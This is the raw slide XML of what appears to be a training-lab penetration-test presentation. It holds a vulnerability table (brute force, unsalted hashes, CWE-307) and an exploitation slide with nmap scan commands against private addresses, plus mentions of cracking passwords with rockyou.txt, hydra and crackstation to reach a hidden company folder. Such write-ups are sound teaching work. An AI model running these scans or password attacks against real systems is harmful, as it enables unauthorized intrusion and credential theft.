                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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84232">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute-Force Attack</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" i="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0070C0"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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50" i="0" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>A brute-force attack consists of an attacker submitting many passwords or passphrases. A list of common username and passwords is used to brute force a username or password field until successful authentication.</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chemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" i="0" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>With the use of a common password list (rockyou.txt), Ashtons password was cracked and it granted the attacker access to the /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" i="0" dirty="0" err="1">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>webdav</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" i="0" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> directory.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" i="0" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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683257">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak Hashed Passwords</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0070C0"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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150" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unsalted hashed passwords can be cracked easily with free available tools (https://crackstation.net)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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chemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The hash stored in “</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" dirty="0" err="1">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>connect_to_corp_server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>” was easily cracked due to the weak original password selected by Ryan.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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683257">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CWE-307</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0070C0"/>
                        </a:solidFill>
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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lgn="ctr">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150" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more susceptible to brute force attacks.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                    <a:lnR w="9525" cap="flat" cmpd="sng" algn="ctr">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chemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1150" dirty="0">
                          <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An attacker could perform an arbitrary number of authentication attempts using different passwords and gain access to the target machine, in my case successfully exploited with hydra.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1150" dirty="0">
                        <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng" algn="ctr">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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1013865716"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39B21E09-20A5-4190-BCCD-FA07FA0B8B4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3265827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AU" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Open Port 80 &amp; Directory Listing Enabled</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480574"/>
            <a:ext cx="2096047" cy="3246283"/>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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480623"/>
            <a:ext cx="2096047" cy="3246233"/>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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used nmap to find open ports and the web browser to navigate trough the Webserver`s directories (Folder).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> 192.168.1.2/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Nmap –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –A 192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Webserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Searching trough the webserver at 192.168.1.105, navigating to directories to reveal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695449"/>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5" y="1885638"/>
              <a:ext cx="340325" cy="188624"/>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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496049" y="1480574"/>
            <a:ext cx="2196827" cy="3206711"/>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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480574"/>
            <a:ext cx="2292692" cy="3016919"/>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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I discovered that 192.168.1.105 had port 80 open, trough which I was able to access important company files on the webserver. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Files &amp; Achievements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meet_our_team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/ashton.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>which led me to the discovery of the secret folder at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
